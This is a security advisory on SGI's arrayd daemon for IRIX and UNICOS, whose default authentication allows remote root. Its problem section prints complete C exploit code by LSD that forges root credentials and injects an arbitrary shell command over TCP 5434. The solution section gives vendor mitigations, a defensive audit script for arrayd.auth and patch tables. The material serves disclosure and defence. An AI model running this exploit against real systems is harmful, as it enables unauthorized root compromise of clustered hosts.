COMMAND

    arrayd

SYSTEMS AFFECTED

    IRIX 6.2-6.5.4, UNICOS 9.0 and later

PROBLEM

    The following is based on an SGI Security Advisory.  The SGI Array
    Services provide a mechanism to simplify administering and managing
    an array of clustered systems.  The arrayd(1m) program is part of
    array_services(5) and is known as the array services daemon.
    Unfortunately, the default security configuration of arrayd from
    arrayd.auth(4) does not provide adequate protection against attack
    when the array of clustered systems is placed on an untrusted
    network.  For example, if the systems are placed on the Internet
    without a firewall, a root compromise of all clustered systems in
    the array is possible when the default arrayd.auth configuration is
    used.

    On IRIX, the SGI Array Services consist of an inst image called
    arraysvcs.  The arraysvcs inst image is installed by default on
    IRIX 6.4-6.5.4 from the IRIX Applications CD and is available as an
    optional product for IRIX 6.2-6.3.  All sites using array services
    on UNICOS 9.0 or later are vulnerable.  Array services are not
    supported on UNICOS/mk, so it is not vulnerable.  The default
    arrayd.auth configuration file has authentication disabled.  A
    local user account on the vulnerable array is not required in order
    to exploit the arrayd daemon; it can be exploited remotely over an
    untrusted network.  The arrayd vulnerability can lead to a root
    compromise on an untrusted network if the array services are
    running and the arrayd.auth configuration file has not been changed
    to enable authentication.

    Code by LSD.

    /*## copyright LAST STAGE OF DELIRIUM aug 1999 poland        *://lsd-pl.net/ #*/
    /*## arrayd                                                                  #*/
    
    /*   this code does the same as the following command invoked with root user  */
    /*   privileges:                                                              */
    /*   /usr/sbin/array -s address launch pvm xxx xxx xxx "\";command;exit\""    */
    /*   there are two possible authentication methods that can be used by        */
    /*   the arrayd service:                                                      */
    /*   AUTHENTICATION NONE                                                      */
    /*       requests from anywhere are accepted                                  */
    /*   AUTHENTICATION SIMPLE                                                    */
    /*       requests from trusted hosts are accepted if they match the host/key  */
    /*       from the arrayd.auth file. if there is no specific host/key pair for */
    /*       a given machine the request is also accepted although it should not  */
    /*       be (see the manual pages in case you don't believe it).              */
    /*       as you see, SGI's suggestion to protect the arrayd cluster by        */
    /*       enabling simple authentication gives no result                       */
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <stdint.h>
    #include <unistd.h>
    #include <errno.h>
    
    /* 64-byte request header; bytes 12..15 receive the body length */
    char msg1[]={
        0x31,0x08,0x12,0x63,0x13,0x54,0x34,0x23,
        0x00,0x00,0x00,0x00,0x12,0x34,0x56,0x78,
        0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    
    /* request body: credentials claiming root, then the "launch pvm" args */
    char msg2[]={
        0x00,0x00,0x00,0x02,0x10,0x00,0x28,0x00,
        0x00,0x00,0x00,0x0f,
    
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* array   */
        0x00,0x00,0x00,0x5c,0x12,0x34,0x56,0x78,   /* args    */
        0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x38,   /* creds   */
    
        /* creds */
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* origin  */
        0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x05,   /* user    */
        0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x05,   /* group   */
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* project */
        0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
    
        'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
        'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
    
        /* args */
        0x00,0x00,0x00,0x06,
        0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x30,
    
        0x00,0x00,0x00,0x3c,0x00,0x00,0x00,0x07,
        0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x4c,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x03,
        0x00,0x00,0x00,0x54,0x12,0x34,0x56,0x78,
    
        'l' ,'a' ,'u' ,'n' ,'c' ,'h' ,0x00,0x00,
        'p' ,'v' ,'m' ,0x00,'x' ,'x' ,'x' ,0x00,
        'x' ,'x' ,'x' ,0x00,'x' ,'x' ,'x' ,0x00,
    };
    
    int main(int argc,char **argv){
        char buffer[10000],len[4],*b,*cmd="id";
        int i,c,sck;
        struct sockaddr_in address;
        struct hostent *hp;
        uint32_t status;
    
        printf("copyright LAST STAGE OF DELIRIUM aug 1999 poland  //lsd-pl.net/\n");
        printf("arrayd for irix 6.2 6.3 6.4 6.5 6.5.4 IP:all\n\n");
    
        if(argc<2){
            printf("usage: %s address [-c command]\n",argv[0]);
            exit(-1);
        }
    
        /* options follow the address, so getopt is run over argv[1..] */
        while((c=getopt(argc-1,&argv[1],"c:"))!=-1){
            switch(c){
            case 'c': cmd=optarg;break;
            }
        }
    
        sck=socket(AF_INET,SOCK_STREAM,0);
        memset(&address,0,sizeof(address));
    
        address.sin_family=AF_INET;
        address.sin_port=htons(5434);                     /* arrayd port */
        if((address.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE){
            if((hp=gethostbyname(argv[1]))==NULL){
                errno=EADDRNOTAVAIL;perror("error");exit(-1);
            }
            memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
        }
        if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
            perror("error");exit(-1);
        }
    
        /* body = msg2 followed by the quoted command string */
        memcpy(buffer,msg2,sizeof(msg2));
        snprintf(&buffer[sizeof(msg2)],sizeof(buffer)-sizeof(msg2),
                 "\";%s;exit\"",cmd);
    
        /* patch the big-endian 32-bit body length into the header */
        *(uint32_t*)len=htonl(sizeof(msg2)+strlen(cmd)+8+1);
        b=&msg1[12];
        for(i=0;i<4;i++) *b++=len[i];
    
        write(sck,msg1,64);
        write(sck,buffer,sizeof(msg2)+strlen(cmd)+8+1);
    
        /* reply: 64-byte header, then the response body */
        read(sck,buffer,64);
        read(sck,buffer,sizeof(buffer));
    
        /* status words are big-endian on the wire, like the length above */
        memcpy(&status,&buffer[8],4);
        if(ntohl(status)!=1){
            printf("error: command refused\n");exit(-1);
        }
        memcpy(&status,&buffer[12],4);
        if((ntohl(status)!=1)&&(ntohl(status)!=2)){
            printf("error: command not executed\n");exit(-1);
        }
        printf("OK!\n");
        return 0;
    }

SOLUTION

    The steps below can be used either 1) to remove the vulnerability
    by removing the Array Services if they are not being used, or 2) to
    enable authentication using an appropriately set up arrayd.auth(4)
    configuration file.  On IRIX:

        1) Become the root user on the system.
        2) Check  to  see  if  the  system  is  running the SGI  Array
           Services.
        3) Edit the default arrayd.auth file to enable authentication.
        4) Comment out authentication  entry in the arrayd.auth  file.
           This will enable SIMPLE authentication.
        5) Configure SIMPLE authentication in the arrayd.auth file  if
           array  services  are  needed  on  untrusted  networks.  See
           arraysvcs release  notes or  arrayd.auth man  page for more
           information on configuring SIMPLE authentication.
        6) Restart  the arrayd  daemon so  that it  will read  the new
           configuration files.
        7) Return to the previous level (if you used su).

    On UNICOS:

        1) Become the root user on the system.
        2) Edit the default arrayd.auth file to enable authentication.
        3) Replace AUTH NONE entry with AUTH SIMPLE in the arrayd.auth
           file.  This will enable SIMPLE authentication.
        4) Configure SIMPLE authentication in the arrayd.auth file  if
           array  services  are  needed  on  untrusted  networks.  See
           arrayd.auth man  page for  more information  on configuring
           SIMPLE authentication.
        5) Restart  the arrayd  daemon so  that it  will read  the new
           configuration files.
        6) Return to the previous level (if you used su).
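    A small audit script for the arrayd.auth checks in the IRIX and
    UNICOS step lists above (IRIX steps 3-5, UNICOS steps 2-4), added
    here as an example; it is not SGI's or LSD's code.  It assumes the
    directive names AUTHENTICATION, HOSTNAME and KEY from arrayd.auth(4),
    and the three sample files it writes are constructed for the
    demonstration (the key value is a placeholder):

```shell
#!/bin/sh
# Audit an arrayd.auth(4) file for the weak default the advisory
# describes. Added example, not SGI's tooling; assumes the directive
# spellings AUTHENTICATION / HOSTNAME / KEY. Sample files are constructed.

# Print the last uncommented AUTHENTICATION value in FILE, or ABSENT.
arrayd_auth_mode() {
    awk 'BEGIN { mode = "ABSENT" }
         $1 ~ /^#/ { next }                      # comment line
         $1 == "AUTHENTICATION" { mode = toupper($2) }
         END { print mode }' "$1"
}

# Count uncommented HOSTNAME lines (one per trusted host/key pair).
arrayd_trusted_hosts() {
    awk '$1 ~ /^#/ { next }
         $1 == "HOSTNAME" { n++ }
         END { print n + 0 }' "$1"
}

# Exit status: 2 = shipped default (NONE, any host may launch commands
# as root), 1 = needs attention, 0 = SIMPLE with at least one pair.
arrayd_auth_audit() {
    mode=$(arrayd_auth_mode "$1")
    hosts=$(arrayd_trusted_hosts "$1")
    case "$mode" in
        NONE)
            printf '%s: AUTHENTICATION NONE - weak default, remote root possible\n' "$1"
            return 2 ;;
        SIMPLE)
            if [ "$hosts" -eq 0 ]; then
                printf '%s: SIMPLE but no HOSTNAME/KEY pairs configured\n' "$1"
                return 1
            fi
            printf '%s: SIMPLE with %s trusted host(s); still apply the vendor patch and filter TCP 5434\n' "$1" "$hosts"
            return 0 ;;
        *)
            printf '%s: no AUTHENTICATION directive (IRIX falls back to SIMPLE, step 4; on UNICOS set it explicitly, step 3)\n' "$1"
            return 1 ;;
    esac
}

# Constructed samples: shipped default, IRIX step 4, and a hardened file.
tmp=${TMPDIR:-/tmp}/arrayd_auth_demo.$$
mkdir -p "$tmp"
trap 'rm -rf "$tmp"' EXIT
cat > "$tmp/default.auth" <<'EOF'
# arrayd.auth as shipped (constructed sample)
AUTHENTICATION NONE
EOF
cat > "$tmp/commented.auth" <<'EOF'
# shipped entry commented out, as in IRIX step 4 (constructed sample)
#AUTHENTICATION NONE
EOF
cat > "$tmp/hardened.auth" <<'EOF'
# SIMPLE authentication with one trusted host (constructed; key is a placeholder)
AUTHENTICATION SIMPLE
HOSTNAME node1.example.com
KEY PLACEHOLDER_KEY
EOF

for f in "$tmp/default.auth" "$tmp/commented.auth" "$tmp/hardened.auth"; do
    arrayd_auth_audit "$f" || :    # a nonzero status is the finding, not a failure
done
```

    Exit status 2 is the shipped default this advisory warns about.
    Status 0 is only the interim measure: the proper solution below is
    the vendor patch, and LSD's comment in the code above notes that
    unpatched SIMPLE mode still accepts hosts that have no entry, so
    keeping TCP port 5434 behind a firewall until the patch is applied
    remains worthwhile.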

    The proper solution is a patch.  For IRIX:

        OS Version     Vulnerable?     Patch #      Other Actions
        ----------     -----------     -------      -------------
        IRIX 3.x-5.X      no                        Note 1
        IRIX 6.0.x        no                        Note 1
        IRIX 6.1          no                        Note 1
        IRIX 6.2          yes          not avail    Note 2 & 3
        IRIX 6.3          yes          not avail    Note 1 & 3
        IRIX 6.4          yes          not avail    Note 1 & 3
        IRIX 6.5          yes          not avail    Note 3 & 4
        IRIX 6.5.1        yes          not avail    Note 3 & 4
        IRIX 6.5.2        yes          not avail    Note 3 & 4
        IRIX 6.5.3        yes          not avail    Note 3 & 4
        IRIX 6.5.4        yes          not avail    Note 3 & 4

        1) This version of the IRIX operating system has been retired.
           Upgrade to a currently supported IRIX operating system.  See
           http://support.sgi.com/news/irix2.html for more information.
        2) This version of the IRIX operating system is in maintenance
           mode.  See http://support.sgi.com/news/irix1.html for more
           information.
        3) Use the temporary solution above.
        4) If you have not received an IRIX 6.5.X CD for IRIX 6.5,
           contact your SGI Support Provider or download the IRIX 6.5.X
           Maintenance Release Stream from http://support.sgi.com/ or
           ftp://support.sgi.com/support/relstream/

    For UNICOS:

        OS Versions          Vulnerable?     Other Actions
        -----------          -----------     -------------
        UNICOS/mk               No
        UNICOS 9.0.X.X          Yes          Note 1
        UNICOS 10.0             Yes          Note 1
        UNICOS 10.0.0.1         Yes          Note 1
        UNICOS 10.0.0.2         Yes          Note 1
        UNICOS 10.0.0.3         Yes          Note 1
        UNICOS 10.0.0.4         Yes          Note 1
        UNICOS 10.0.0.5         Yes          Note 1
        UNICOS 10.0.0.6         Yes          Note 1

        1) See the temporary solution above.